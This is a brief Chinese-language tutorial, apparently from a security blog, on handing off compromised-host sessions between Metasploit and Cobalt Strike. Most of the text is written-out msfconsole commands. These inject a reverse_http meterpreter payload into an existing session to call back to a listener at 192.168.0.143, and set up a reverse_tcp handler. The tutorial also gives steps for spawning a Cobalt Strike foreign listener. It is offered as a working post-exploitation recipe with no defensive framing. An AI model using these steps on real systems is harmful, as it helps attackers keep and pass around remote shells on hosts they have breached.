前言
一般大家都是两款神器结合使用,自然少不了shell之间转换。
msf转cs
首先cs创建一个windows/becon_http/reverse_http的 Listener
再用msf弹shell过去
msf exploit(handler) > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.0.143
msf exploit(payload_inject) > set LPORT 4444
msf exploit(payload_inject) > set SESSION 1 (用session命令可以查看对应id)
msf exploit(payload_inject) > exploit
cs转msf
先用msf监听
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.143
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
再用cs反弹
创建一个windows/foreign/reverse_tcp的 Listener
然后选中对应机器,右键->Spawn,选择刚刚创建的监听器。
ps:注意两边用的payload要一致